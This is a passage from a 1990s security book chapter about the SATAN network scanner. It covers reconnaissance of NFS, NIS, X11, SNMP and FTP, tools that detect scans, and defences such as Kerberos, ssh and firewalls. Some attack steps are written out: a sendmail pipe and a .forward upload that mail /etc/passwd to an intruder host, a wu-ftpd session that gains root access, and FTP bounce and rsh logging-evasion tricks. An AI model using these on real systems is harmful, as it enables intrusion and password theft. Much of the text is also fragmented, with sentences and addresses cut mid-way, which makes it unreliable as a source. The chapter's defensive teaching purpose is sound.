mail:ttys9 Oct 16 15:42
mail:ttysb Oct 10 08:27

115:28
607:20
473:41
126:18
447:27
65:27

(m2
...
com)
(sys1
...
com)
(sys2
...
com)
(m3
...
com)
(m4
...
com)
(sys2
...
com)

The third program, rwho, depends on a daemon called rwhod that does periodic network
broadcasts of who is on a system to other rwhod programs
...
Because the broadcasts don’t go past the local LAN segment, the hacker never sees
an update
...
yahoo
...


NFS Export Information
For those systems that indicate a mount service via the rpcinfo -p list, the showmount program
can interrogate rpc
...
The showmount -a command prints out a list of which
hosts have mounted the exported file systems
...
notreal
...
notreal
...
notreal
...
notreal
...
notreal
...
notreal
...
SATAN scans for unrestricted NFS access and indicates this as a
potential problem in its reports
...
The
/cdrom file system is probably acceptable, because it is read-only, as long as the cdrom does not
contain private information
...

The /usr directory is probably acceptable if it is exported read-only, because it usually contains
binaries
...
If the directory is writeable and binaries are owned by non-root
users, the integrity of the binaries is at risk
...
This is a major vulnerability if the system permits
...
Xauthority
files, or
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

460

Part II: Gaining Access and Securing the Gateway

By gaining access to the /var/yp directory of a system that is a yp/NIS server, as indicated by
the portmap information, you can determine the domain name for yp/NIS
...
If you have write access to that system via NFS, you
can rewrite the passwd map files and distribute them to all the yp/NIS clients in the domain
...
When used, it should be read-only if
possible
...
Hackers can cope
with only so much laughter
...
These maps include passwd, hosts, aliases, services, and others
...
There are several ways to
get the NIS domain name: the bootparam method (mentioned previously and used by
SATAN), the NFS server method (also mentioned previously), and intelligent guessing (also
used by SATAN)
...
For example, notreal might be a good guess for the NIS
domain for notreal
...
The ypx program can help guess a domain name and transfer an NIS
map from the NIS server
...
The hacker could then answer this request and have the client bind to the hacker’s
system, and distribute the passwd map to this client
...


Tip

NIS should never be accessible to the Internet and should not be used in a potentially hostile environment
...
NIS+ tries to address many of these issues and should be considered
as a replacement
...

Although the only Web server vulnerabilities discovered have been related to the https (SSL
version of http) services, the dynamic growth of Web server functionality will certainly lead to
vulnerabilities
...

Even though there are no current Web server vulnerabilities, Web servers are a source of
information leakage
...
By
using a Web browser, a hacker can find information about users and systems in the remote
network
...
html or similar Web page
paths, scanning the pages for addresses with the domain notreal
...
(PERL would seem ideal
for this task
...
0 or SSLeay
...
) SATAN could easily be modified to support such Web
scanners
...
com connect to it, a hacker can gain
information about the client systems
...
Of course, such an approach can be extended to making
corrupted binaries, Java pages, PostScript documents, or e-mail messages
...


Note A useful Web site for looking up user e-mail addresses is http://okra
...
edu/
okra/
...


NNTP Information
SATAN does not scan for information available through network news
...
It is possible to scan every posting to
network news for addresses ending in notreal
...
These could be part of e-mail addresses of
the posters from within notreal
...
com users
...
com’s
systems and users
...
Having embedded MIME statements in
news postings can be a hidden danger if the newsreader, such as tin or Netscape, can interpret
them
...
rhosts
file, this could open your system to a trust attack
...
These packets
can be used to build up a picture of the routing tables (netstat -r) on each of the systems in
notreal
...
They also help to add hostnames to the list of systems in that domain
...
SATAN indicates whether or not a system is running
gated
...
Programs such as idlookup enable you to determine information about the originator
of a network connection to your system
...
If you can get a user to connect (by sending mail to you, ftping to you, or using a
Web browser to connect to your Web site), you can use idlookup to gain this information
...

If a hacker knows that a large server is accessed by a client at a certain IP address, for example,
the hacker can do multiple connects to the auth port on the large server, masquerading as the
client (perhaps using the FTP server bounce vulnerability), indicating the shell or login ports as
destination ports on the server, and scanning all possible ports on the client
...
These users would be possible victims for an
...


Packet Sniffing
Although packet sniffing is more closely related to the third phase of a network attack, and
SATAN deals mainly with detecting first phase vulnerabilities, packet sniffing is still one of the
most commonly used Internet attacks
...
com
...
Capturing X authority information, NIS maps, or DNS maps can also be quite
useful
...
Even
if the hacker sees only a password for a user on an outgoing connection, a login/password
combination is useful knowledge because most users use only a limited number of different
passwords
...
com
...
It could be used to provide an example of how to embed a
packet sniffer into another program in a virus type format
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

463

SATAN and the Internet Inferno

Note tcpdump and libpcap are available from the CIAC archives at http://
ciac
...
gov
...
When tcpdump is run, it prints
out the contents of each packet that passes by the network interface
...
libpcap offers a library of routines that monitor LAN traffic
...


IP Layer Information
A hacker would like to know if the target systems permit IP source routing and IP forwarding
...
The traceroute program is a useful vehicle for this;
using the -g option for loose source routing, or by modifying it for full source routing, the
intruder can source route a packet to the target and attempt to get a reply
...

If the target system has a weak firewall implementation, such as something that does only
application-level filtering, the hacker could try to get the transport layer to send a packet into
the network by using IP forwarding
...
If a hacker is able to see such
fragmentation occurring, by packet sniffing, the hacker can try to exploit it by intercepting the
connection and spoofing portions of the TCP header
...


X11 Information
An improperly configured X Windows server is a major vulnerability
...
By using an XOpenDisplay() call to the target system, a hacker can
identify if access controls permit a remote user to capture control over it
...
The SATAN reports indicate whether or not remote systems have X Windows access control
...
An option to rexd can require
the remote system to be listed in the hosts
...
Even if
the remote system hostname must be listed in hosts
...
A hacker can

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

464

Part II: Gaining Access and Securing the Gateway

try to poison a dns cache with face resource records to circumvent this security
...

SATAN includes a scan for rexd
...
This
also permits a hacker to gather information about remote hosts and routers
...
There are two kinds of requests:
s SNMP GetRequest
...

s SNMP SetRequest
...
An MIB corresponds
to a system setting
...
SNMP applications are on
ftp://lancaster
...
cmu
...

The three most useful applications are snmpget, snmpnetstat, and snmpwalk
...
The snmpnetstat utility can be used by a hacker to effectively
run netstat on the remote system
...
notreal
...
telne
tcp
0
0
sys2
...
com
...


Foreign Address
m2
...
com
...
notreal
...
2895

(state)
ESTABLISHED
ESTABLISHED

The snmpwalk generates a printout of vast amounts of information about the remote system,
much of it related to kernel transport status
...
conf file
...

By default, remote users cannot alter MIB values but can read all MIB values
...
conf
file has a set-community-name setting, remote managers can do SNMP SetRequests, permitting them to modify the local system’s MIB values
...
If the snmp
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

465

SATAN and the Internet Inferno

Although snmp v1 is useful for gaining system and routing information, the new snmp v2 has
adequate security to prevent most attacks
...
SATAN does scan for
the presence of snmpd, but does not interrogate the server for information
...
While major vulnerabilities in these services are not popularly known, their
presence may be useful as new vulnerabilities are discovered
...
Although uucp used to be very helpful for attacking systems, its
usage has dropped considerably
...

Similarly, gopher’s popularity has declined dramatically as the popularity of the World Wide
Web has gained
...

talk is still a useful attack point, because it permits a remote user to write to a user’s tty,
perhaps invoking commands and actions
...
relay chat is interesting, but it offers
little for attack and will certainly waste your time
...
Finally, systat is rarely seen but remains a great source of
information when it is present
...
This corresponds to the completion of a SATAN scan
...
In addition, SATAN would
generate reports and databases of additional hosts to scan in the future
...
A vigilant system administrator should consider adding additional scans to
SATAN to cover all possible vulnerabilities
...
Most
vendor code is based on publicly available source, from BSD, ATT, Sun, or private locations
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

466

Part II: Gaining Access and Securing the Gateway

The Linux distributions are extremely helpful in understanding the operation of most programs
...
For example, NIS+ from Sun has a cousin in Linux called NYS
...
unc
...

The BSD44 distribution is available on CD-ROM from many bookstores now and is useful in
understanding the transport layer implementation as well as many of the standard services,
such as rlogin or inetd
...
cs
...
edu
s bind: ftp://gatekeeper
...
com/pub/misc/vixie
s wu-ftpd: ftp://wuarchive
...
edu
s httpd: http://www
...
uiuc
...
tis
...
One vendor might fix one problem on one platform,
but the other platforms from that vendor won’t be fixed until later, and platforms from other
vendors won’t be fixed for quite some time later
...
com’s systems for these holes
...

Some Unix problems are re-opened in new releases, or are never really closed
...
Has there ever
been a new Unix OS release that didn’t have at least one set-uid root script?
The hacker has gathered quite a bit of information on the remote systems in notreal
...
At this point, an hacker should be able to identify some weaknesses—a system that
offers unrestricted NFS exports or X Windows server access, for example
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

467

SATAN and the Internet Inferno

As an example, any weaknesses in sendmail, due to old versions or configuration mistakes,
might permit the sending of the /etc/passwd file
...
An accessible X Windows system can allow a hacker to take
control of the target
...
An NFS server
can offer access to file systems
...
The tftpd might permit the downloading of files from any directory
...
rhosts into the ˜ftp directory
...


Look for Weak Links
If the network scans don’t reveal any vulnerabilities, the hacker may need to resort to nonnetwork attacks
...
The hacker uses a modem to call every single phone extension in an
organization until the hacker discovers all modems connected to phone lines
...
” If the site permits dial-in access, this could lead
to an intrusion
...
The
hacker might try to use people inside the organization, or former employees, to gain information or access
...


Summarize the Remote Network Attack
To summarize, the first phase of an attack is to get a login and password on the target systems
...
By matching the vulnerability with the opportunity, the hacker can
gain access
...
One should seriously consider automating the search for network vulnerabilities
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

468

Part II: Gaining Access and Securing the Gateway

The First Meeting with SATAN
“Soon will rise up what I expect;
and what you are trying to imagine now
soon must reveal itself before your eyes
...
The authors indicate that SATAN stands for “Security
Analysis Tool for Auditing Networks
...
Users indicate a target host or network,
along with proximity search levels and search depth, and initiate a search
...
(Proximity rules are fully explained later in this chapter
...
SATAN can be configured to
make scans of the target and all hosts that are a certain proximity level away from that target
...

SATAN consists of a small PERL kernel, along with a number of C programs that do vulnerability checks, and a large number of PERL support programs that control the searches, store
results to database files, generate reports, and emit HTML forms
...


History
The two authors of SATAN, Wietse Venema and Dan Farmer, have had a long history of
association with network security
...
html Web page in their
SATAN distribution, some of the design goals of SATAN were as follows:
s Investigate mapping of the security of large networks
s Use the traditional Unix toolbox approach of program design
s Make the product freely available
s Discover as much network information as possible without being destructive
s Create the best investigative security network tool
Although early versions of SATAN were already available in late 1993, the advent of Web
browsers in 1994 seemed to be the big turning point for the direction of the program
...
The creators choose April 5,
1995, Dan Farmer’s birthday, to release SATAN to the world
...
This could have been due to the media’s continuing interest in network security,
the unique name of the program, or the flamboyance of one of the creators
...
” The
Los Angeles Times warned, “SATAN is like a gun, and this is like handing a gun to a 12-yearold
...
The San Francisco Chronicle had photos of Dan Farmer,
along with the story
...
The program was distributed by dozens of FTP sites to thousands of users
...

Quite quickly, a security hole was found in SATAN, resulting in a revision and redistribution
of the program
...
SATAN did not appear to greatly increase the number of
intrusions, but it did lead to a strengthening of network security by causing vendors to release
patches and users to inspect and tighten up their system security
...

Individual users have added such probes but are perhaps not forwarding these additions back
to the major distributions
...
He has written many useful security tools, such as tcp_wrappers, a secure
portmap program, a secure rpcbind program, logdaemon, which improves logging and
auditing, as well as SATAN
...
A complete list
of his papers and tools is available via ftp://ftp
...
tue
...
html
...
As a result of SATAN’s release, he was interviewed on TV and quoted in
quite a few newspapers and magazines
...
His home page is at http://www
...
com/dan
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

470

Part II: Gaining Access and Securing the Gateway

Comparison to Other Tools
SATAN was not the first program to look for network vulnerabilities
...
Unlike SATAN, the latest ISS is not free, but is instead a commercial product that
does not include source code
...
com/ for more information
...
uunet
...
sources
...

Fremont, a freely available program, does a scan of hosts and attempts to build a map of
systems
...
It is available from ftp://
ftp
...
colorado
...


Vendor Reactions
SATAN had the effect that the creators may have secretly desired
...
Such public disclosure of holes is risky, however; users who are unaware of
workarounds or patches may be vulnerable to holes for some time, whereas intruders have been
alerted to them
...
All the major vendors released extremely detailed bulletins in response to
SATAN, some before SATAN’s release and the rest within weeks after SATAN’s release
...
The bulletins also indicated configuration recommendations and advice
on the trade-offs between running some products (finger) and the risk involved
...
See
http://ciac
...
gov/ciac/
...

Surprisingly, few stories of intrusions as a result of SATAN have been publicized
...
For HP,
the SATAN advisory continues to be requested every week, making it the most popular
security bulletin ever published, with perhaps 10,000 copies distributed
...
SATAN does provide a flexible architecture for adding such checks, an
easy way to intelligently scan many hosts, as well as a nice reporting mechanism and database
format
...
The most popular
SATAN detection program is Courtney, but the others listed here are also quite useful
...
The program is a short
PERL script that uses the tcpdump packet sniffer library (libpcap) to monitor all network
traffic to a system
...

Courtney requires the tcpdump libpcap library, which uses the systems LAN in promiscuous
mode, something that not all systems support
...
llnl
...


Gabriel
Instead of a PERL script, Gabriel is a binary, built from C source, that offers similar functionality, but without requiring the tcpdump libpcap library
...
It is freely available from http://www
...
com/gabe
...


TCP Wrappers
The TCP wrapper program can be used to log attempts to connect to network services
...
In addition to the TCP_wrappers program, some inetd programs, and xinetd,
include TCP wrapper functionality
...
tcp_wrappers can be used to permit (/etc/hosts
...
deny)
access based on the remote IP address and the owner of the remote connection
...
Many inetd programs use inetd
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

472

Part II: Gaining Access and Securing the Gateway

Xinetd provides this functionality and adds control over the time of the connection attempt
...
Xinetd also permits
access control over every UDP packet instead of just the initial one
...
win
...
nl/pub/security
...
ieunet
...
14
...
gz
...
Although intended for Sun systems,
netlog should be able to be ported to any system that offers similar functionality
...
tamu
...


Argus
CMU’s SEI group, closely associated with CERT, offers an IP network transaction management and monitoring program called Argus
...
sei
...
edu/
pub/argus-1
...


Using Secure Network Programs
You are now aware of the following:
s The details of the first phase of a network attack
s How SATAN is used to mount these attacks
s The resources available for dealing with network vulnerabilities
s The network monitoring tools that can detect attacks
...
Although minor changes to existing network services can minimize vulnerabilities, major
changes are frequently required to deal with inherent problems of the Internet
...
SATAN
searches for phase one vulnerabilities that permit unauthorized access
...
By using Kerberos, a system is no longer
vulnerable to
...
SATAN is still useful against Kerberized
environments, however, by helping remote hackers to identify KDCs
...

The primary problem with Internet security today is that the passwords of users go across the
network in the clear, and authentication is based solely on the IP address and password
...

MIT developed a system called Kerberos that uses the DES algorithm to encrypt network
connections and provide for authentication
...
Each network service is modified to use authentication based on tickets that are
handed out by the KDC in response to requests by network clients
...
This generates a request from the workstation to the KDC for a ticketgranting ticket (TGT) that is good for the rest of the day
...
The ticket contains a session key that is then used by both the
telnet client and server to encrypt the connection
...
Kerberos uses the 56-bit DES algorithm to encrypt packets
...
S
...
Although 56
bits sounds strong, it isn’t that strong, and brute force attacks can decrypt packets
...
The system admin must now maintain
KDCs to support the network
...
If the KDCs are violated, the security of the entire network has
been destroyed
...
Some Kerberos implementations are unsecure on
multiuser systems
...
Imagine if the KDC ran NFS; the
hacker could use NFS-based attacks to gain access to that system, permitting the hacker to gain
access to all systems that trusted that KDC
...
S
...
cygnus
...
Other vendors, such as
Cybersafe, offer commercial Kerberos implementations
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

474

Part II: Gaining Access and Securing the Gateway

Secure Shell (ssh)
SATAN searches for phase one vulnerabilities
...
A replacement for rlogin, remsh, and
rcp, ssh doesn’t require the overhead of Kerberos (users don’t have to kinit, and the system
administrators do not need to maintain KDCs) and offers higher levels of cryptographics
security
...

ssh protects against IP spoofing, IP source routing, DNS spoofing, corruption of data in a
connection, and X authentication attacks
...
uni-karlsruhe
...
The program itself is available from ftp://ftp
...
hut
...


SSL
Yet another way of dealing with phase one vulnerabilities, the vulnerabilities that SATAN is
designed to locate, is SSL
...
A draft RFC
describes version 3 of the protocol, enabling anyone to implement daemons, although licensing
for the public key technology is still required
...
The public key is stored in an X
...

SSL moves the details of encryption and authentication into the socket library calls, making
implementation of Internet programs much easier
...
Compared to making a Kerberos server, making an SSL server is vastly
simpler
...
So the network connection is a two-party transaction,
rather than a three-party transaction
...
The SSL protocol
negotiates a crypto algorithm at the beginning of a connection; DES, triple-DES, IDEA, RC4,
and RC2, along with md5 hashes, are advertised in common implementations
...
S
...
S
...

Two publicly available implementations of SSL libraries are popular: SSLref and SSLeay
...
It requires the RSAref library from RSA Corporation
...
S
...
The addresses follow:
s SSLref Source: http://www
...
com
s SSLeay Source: http://www
...
uq
...
au/˜ftp/Crypto/
s RSA Source: http://www
...
com
s VeriSign: http://www
...
com
s SSL RFC Draft
...
cnri
...
va
...
txt

Firewalls
SATAN is primarily intended for remote scanning of systems connected to the Internet
...

A firewall system is one that connects an internal network to the Internet
...
By reducing
the number of systems directly on the Internet to a limited number that are under the scrutiny
of administrators, the level of vulnerability can be minimized
...

The DNS configuration on the firewall system should minimize the amount of information
available to external users
...

Modifying a company network to use firewalls is a complex task that requires time and
consideration
...
CERT has a
paper on packet filtering that can assist you in configuring a firewall
...
com
...
Other papers on the topic are available via
the COAST and CERT archives
...
Some
firewalls permit telnet or FTP connections to cross the firewall by requiring an additional
password for the firewall; some use S/Key; and some use SecurID smart cards
...

The importance of properly configuring a firewall, applying patches in a timely manner, and
limiting the amount of services available to Internet users cannot be overestimated
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

476

Part II: Gaining Access and Securing the Gateway

The addresses follow:
s TIS firewall: ftp://ftp
...
com/pub/firewalls/toolkit
s CERT packet filtering paper: ftp://ftp
...
org/pub/tech_tips/
packet_filtering

s S/Key source: ftp://thumper
...
com/pub/nmh/skey

Note For more information on firewalls, see Chapter 7
...
It permits users to conveniently use Internet services across a gateway
without being aware that a gateway is being crossed
...
As a result, SATAN’s scan of target firewall systems will frequently
indicate the presence of a socksd
...

Normally, a telnet from host A to host B does a connect() directly between the two IP addresses using the standard transport routing tables
...
If it is, it follows that standard
connection process
...
It then encapsulates the
TCP packets according to the socks protocol and sends them to the socks server, which runs
on a gateway system and has direct connectivity to the destination system
...

If your firewall configuration supports a socks server, you must have socksified clients to take
advantage of this service
...
)
The addresses follow:
s socks: ftp://ftp
...
com/pub/security/socks
...
socks
...
com
s HP-UX socks: ftp://ftp
...
hp
...

—Dante Alighieri, Inferno, Canto XVII, lines 27–29
This section describes the exact details of the network holes uncovered by SATAN, as well as
holes that are common
...
The
number of ports scanned depends on the type of scanned specified: light, normal, or heavy
...

The dns scan uses nslookup to gather as much information as possible about the target host,
including MX records and authoritative name servers for that host
...
It then scans this list, looking for the
following services: rexd, arm, bootparam, ypserv, ypbind, selection_svc, nfs, mountd, rusersd,
netinfobind, and admind
...
The showmount scan first asks the target
mountd to list what file systems are exported and what hosts are permitted to mount them (via
the showmount -e command)
...


Normal Scans
The normal scan does everything included in the light scan and adds scans of fingerd, various
TCP services, and UDP services
...

If the target is m2
...
com, the finger scan tries to finger -l the following:
@m2
...
com, 0@m2
...
com, @@m2
...
com, root@m2
...
com,
demo@m2
...
com, and guest@m2
...
com
...
SATAN then scans UDP ports for dns
and xdmcp
...

SATAN now tries to contact the rpc bootparam service to get the NIS domain name
...

If SATAN gets the domain name, it then runs a yp-chk program to try to get the
passwd
...


Heavy Scans
The heavy scan includes everything from the light and normal scans and adds a much larger
search for active services
...
(A comment in
satan
...
) The
UDP scan runs from 1 to 2050 and from 32767 to 33500
...
satan scripts need to be
run, based on the results of the previous port scans
...


Vulnerabilities that SATAN Investigates
SATAN includes checks for a number of common security vulnerabilities
...
If it does, it
checks to see if the ˜ftp directory is writeable by the anonymous user
...

The SATAN documentation explains how these checks correlate to known vulnerabilities
...
The documentation also
mentions that the ˜ftp/etc/passwd file is a useful item, but SATAN does not attempt to retrieve
this
...
First, the presence of anonymous FTP is not a
security hole in itself
...

A hacker with access to the ˜ftp directory can upload an
...
The hacker can then rlogin to the system using the FTP
login account and gain access without typing a password
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

479

SATAN and the Internet Inferno

A hacker could upload a
...
com < /etc/passwd, into the ˜ftp directory
...
The hacker can then use Crack to attack the passwords on the
system
...
A system using ftpd with sublogins depends on ˜ftp/etc/passwd for permitting access to
users
...
Similarly, modification to utilities such as bin/ls or bin/sh
can offer the intruder opportunity for attacks
...
Some unsuspecting users might retype their password to this bogus prompt,
and the modified /bin/ls could store this information
...

The wu-ftpd program had two vulnerabilities, CERT CA-93:06 and CA-94:07, that permitted
remote users to gain access to the system
...
Second, the SITE EXEC command permitted users to execute commands as
root
...

The presence of an ˜ftp/etc/passwd file with encrypted fields is another potential security hole
...
For those ftpds that use sublogins, the encrypted fields are
used for authentication
...
Users should be
required to have different passwords for anonymous sublogins and normal system logins
...
SATAN
does not get the ˜ftp/etc/passwd file
...
This
problem could be checked by trying a PORT command with an IP address different than the
originating source, or with a privileged TCP port number on the originating source
...
2
...
4, the hacker would specify
PORT 1,2,3,4,0,25 to spoof e-mail onto his or her own system, or PORT 2,3,4,5,0,21 to
spoof the IP address to the FTP port of the system at IP address 2
...
4
...
A fixed ftpd would
not permit either action
...

As mentioned in the white paper, a remote user could gain root access by embedding a CWD /
command between the USER and PASS commands
...
com
Connected to notreal
...
com FTP server ready
...


At this point, the ftpd has chrooted to the / directory rather than the ˜ftp directory and has
suid to root
...
An unimplemented fourth
level of SATAN scanning, “All Out,” would probably be the right place for such a scan
...
From
a SATAN standpoint, this does not matter as long as anonymous FTP is enabled
...
Wu-ftpd also features another configuration file
called ftphosts that can be used to specify hosts that are not permitted to use FTP
...
The assumption behind this
concept is that only trustworthy people are able to get root privileges on any system connected to
the Internet
...
To add to this poor assumption, PCs do not typically support the concept of privileges,
and they are connected to the Internet
...

Regardless of the naive assumption behind privileged ports, many network servers can and
do require that clients originate requests from privileged ports
...
The NFS and mountd
services can be configured to require client requests to originate from privileged ports
...
The mount of a remote NFS file system causes the local system to
generate an rpc procedure call to the mountd program on the remote system
...
The mountd sends the file handle if the request originated from a
system listed in the export file list
...
Once the mountd approves and sends the client
a file handle for the file system, the client can now request any file operation on that file system
by just providing the file handle as authentication, along with any desired uid and gid (they
must be valid on the remote system)
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

481

SATAN and the Internet Inferno

Each file system operation done by the client user gets translated into one of 17 rpc requests
to the remote NFS server
...

The privileged port check for the mountd (rpc
...
The mountd must have been compiled to support this feature
...

The privileged port check for the nfs request is not done in the nfsd program, but rather inside
the Unix kernel
...
It is most useful to have both mountd and nfs check
for privileged port access
...

SATAN tests unprivileged access to both the mountd service and nfs service by generating
non-root rpc calls to both
...
It asks the mountd for
a list of exported file systems, and it asks nfs to do an ls -l type listing of each file system
...
This list specifies
which hosts are permitted to mount the file systems
...
) The hosts can be specified explicitly by name, by netgroups, or by the wild
card everyone
...
The NFS server believes that the client NFS call has valid uid and gid
values
...

If no root access is permitted, any client can mount the file system and act as any user
...
The quicker way to do this is to use
one of the many NFS hacking utilities to change the uid and gid and then call the NFS call
directly
...
The FTP locations of these utilities can be found by doing an
Archie search
...
The SATAN scan could see this or
the everyone export as unrestricted NFS access and report it as a vulnerability
...
If root
access is exported, the hacker has complete control
...
A simple
...
If the hacker has only read access, damage is still likely
...

Another bug in older versions of NFS permitted remote users with a uid of 2^16 to masquerade as root
...

The use of netgroups has been the source of many security vulnerabilities
...

Avoid exporting NFS files systems with write permission, especially when root permission is
granted
...

Carefully review the netgroup’s man page to ensure the correct format for entries
...
Any client that is able to provide a domain name
can bind to the server
...
The only protection for these maps is the secrecy
of the domain name
...
However, if the remote system runs a bootparam service from the portmap
program, an rpc call to this service returns the domain name
...

After an intruder has this map, a Crack program can attempt to guess the passwords
...
They should always be used behind (and not on) firewalls that filter out traffic
on port 111 (portmap)
...
Because mountd authenticates the client rpc call based on the source IP address, a
request originating from the portmap program would appear to originate from the local
system
...
As long as the local system was permitted to
gain access to itself, the mountd would reply with the file handle for the NFS mount
...

A new portmap program (and rpcbind) prevents such forwarding, and this fix has been
adopted by most vendors
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

483

SATAN and the Internet Inferno

Note More details on this vulnerability are available from CERT bulletin CA-94:15, NFS
Vulnerabilities
...


SATAN attempts to get the portmap program to forward a request to the mountd to mount
the exported file systems
...
c program
...


tftp File Access
Many tftpd implementations do no authentication on incoming requests
...
sec, tcp-wrapper, or xinetd) can do authentication, tftpd should be started only from
inetd and should exit after servicing one request
...

A hacker with access to a tftpd that permits access to / can enter a new /etc/passwd, because
tftpd has no authentication and is frequently run as root out of inetd
...
Note
that tftpd does not usually provide a listing facility to show what files exist in the directory
...

Based on knowledge about the OS, the names of boot files and configuration files are typically
quite similar
...


Remote Shell Access
rshd (remshd) and rlogind are services that permit access based on trust
...
rhosts or
hosts
...

One analogy to this situation, which might illustrate the weaknesses, is if you are a bank
manager and you tell your tellers to trust anyone named Bob calling from Cleveland
...
The typical entry in

...
equiv is a hostname followed by a username, such as systemA userB
...
The wild card
entry + + permits any user from any machine to gain entry
...

The presence of + + in the /
...
This addition to /
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

484

Part II: Gaining Access and Securing the Gateway

The first improvement to rshd (remshd) and rlogind to deal with improving trust-based
security was the reverse name lookup using the DNS resolver
...
If the hostname matches the hostname sent by the
initial protocol, access is permitted
...
If the owner’s name matches the name claimed by the caller, access is approved
...
If the resolver lookup for the
hostname contacts a caching name server, the name server could have cached a faked PTR
entry that points to the intruder’s name server
...


Note The ftpd server bounce problem mentioned in an earlier section cannot be used to
exploit the TCP port number sent in the opening of the rshd (remshd) protocol
...
Any hacker who wanted to send a potentially untraceable packet, by
specifying a reserved port number such as smtp or FTP, would first require root
access to the system to be able to send the initial rsh (remsh) protocol, because they
must originate from a reserved port and such ports can be obtained only by a root
user
...


System accounts such as bin or daemon should not have functional shells
...
rhosts file exists in /usr/adm
...
rhosts file existed
...
rlogind and telnetd invoke /bin/login, which logs
information into those auditing files
...
The hacker could invoke rsh to the system and invoke

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

485

SATAN and the Internet Inferno

csh -i, which would offer the hacker a shell (but no pty/tty) but leave no traces in the utmp/
wtmp
...

Trust-based mechanisms are dangerous
...
Firewall systems should
never permit
...
equiv files to be used
...
conf to prevent
...
equiv files from
being accessed
...
It first tries as user bin and root
...
equiv
...


rexd
The rexd service enables a remote user to execute a command on the server, similar to rsh or
remsh but with the added feature that the local file system of a user is NFS-mounted on the
remote system, and local environment variables are exported to that remote system
...

The client system uses the on command to invoke the command on the remote rexd server
...
A hacker can either su to a
uid that exists on the remote system, such as bin or daemon, or create a custom program that
does this automatically
...

The rexd can be invoked with an -r option to require that the client system be listed in
hosts
...
rexd is invoked from inetd, so the tcp-wrapper, or inetd
...
However, both of these security enhancements are somewhat weak
...

SATAN checks with the portmap program to see if rexd is available and then uses rex to get
the /etc/motd as proof of access
...
This is a requirement for standard
e-mail service
...
New ones are found quite frequently
...
If the version corresponds to one before 8
...
10 (with some corresponding vendor-specific version numbers), it reports a vulnerability
...

sendmail should not permit remote users to specify a file or a program: these should only be a
result of alias or
...

For example, old versions of sendmail permitted a remote user to specify a recipient of /home/
bkelley/
...
The data portion of the mail message would be appended to this file
...

For an example of program mailing, recent versions of sendmail permitted a sender to be a
program: during the smtp transaction, a mail from: ‘|/bin/mail bkelley@intruder
...
This command would then mail the /etc/passwd file
to bkelley
...
Another attack found in 5
...
If sendmail queued the file, the second user
would be written to a separate R line in the queue file and never be tested to see if it was a
program or file
...
However, not all systems are vigilantly patched
...
This permits any remote system to gain control over the system, including reading
user keystrokes, reading anything that is sent to the screen, starting or stopping any application, and taking control over the currently running session
...
It could use the XOpenDisplay() call to see if the
remote display permitted the intruder system, and therefore anyone, to have access
...
notreal
...
0 xhost
...

Instead of using the xhost mechanism, which depends on IP addresses for authentication, the

...
A utility program called xauth extracts a magic
cookie from the X server
...
) This magic cookie can be sent to client systems and merged with
the
...
Each access by the client system
includes the magic cookie that the X server uses to authenticate the client request
...
If the
client’s
...
Note
that the magic cookie approach now permits user authentication rather than xhost’s mere
system authentication
...
Xauthority file containing magic cookies
for accessible X servers
...
An improved
randomization algorithm is referenced in the advisory (Fisher, 1995)
...
If the xterm has an X resource definition
of xterm*allowSendEvents: True, then the X server can request the xterm to send information
about events such as keystrokes
...

The xterm can dynamically set this option through the xterm’s main options menu
...


In general, if xhost access is permitted, the remote system names should be specified rather
than +
...
Xauthority mechanism should be used if at all possible
...
When run interactively, SATAN runs a simple HTML
server, perl/html
...
The HTML
server listens on a random port and requires a password to permit access to various URLs
...

The goal of this design is to prevent unauthorized users from sending requests to the HTML
server
...

Because the SATAN HTML server runs on the same system as the browser, the URL is never
sent over a network
...
With version 1
...

In general, exit the Web browser after running SATAN and before trying to use the browser to
connect to other Web sites
...
Web browsers that permit remote Web sites to gather information
on previous URLs represent a security problem, because they contribute to information
leakage
...
6) do not transmit URL information
...
1 and up, SATAN rejects requests that originate on hosts other than the one
that SATAN is running on, based on source IP address
...


A Modem on a TCP Port
SATAN sends a standard modem AT command to each TCP port
...

An intruder who finds a modem directly connected to the TCP port of a remote system can
use it to directly dial out
...
If a modem is
required on a TCP port, a tcp-wrapper and/or S/Key authentication should be considered
...


Passwords
Password selection is very important
...
Programs that force users to choose good passwords can help protect logins
...


Tip

A paper by Walter Belgers (Belgers, 1991) on choosing passwords is very useful
on this topic
...
win
...
nl/pub/security/UNIXpassword-security
...
Z
...


It is dangerous for a user to invoke standard telnet, rlogin, or FTP over the Internet
...
One must assume that a hacker is packet
sniffing and watching for the unencrypted transmission of passwords, as is typical in FTP,
telnet, rlogin, and rexec
...

Users should change passwords often and consider using one-time passwords (S/Key, or Opie),
ssh, SSL applications, Kerberos (tickets), or smart cards
...
Not putting them into ˜ftp/etc also protects user passwords
from Crack attacks
...
Some versions of ftpd,
notably wu-ftpd, permit sublogins, where a user first logs in anonymously, gets
placed into a chrooted environment of ˜ftp, then does a sublogin as that user
...
The
admin should require each user to choose a new password, clip the encrypted
version of that from the /etc/passwd field, put that in the ˜ftp/etc/passwd entry, and
then require the user to select a new and different password for the regular account
...


As an administrator, there is one way to deal with protecting the NIS passwd map: run NIS
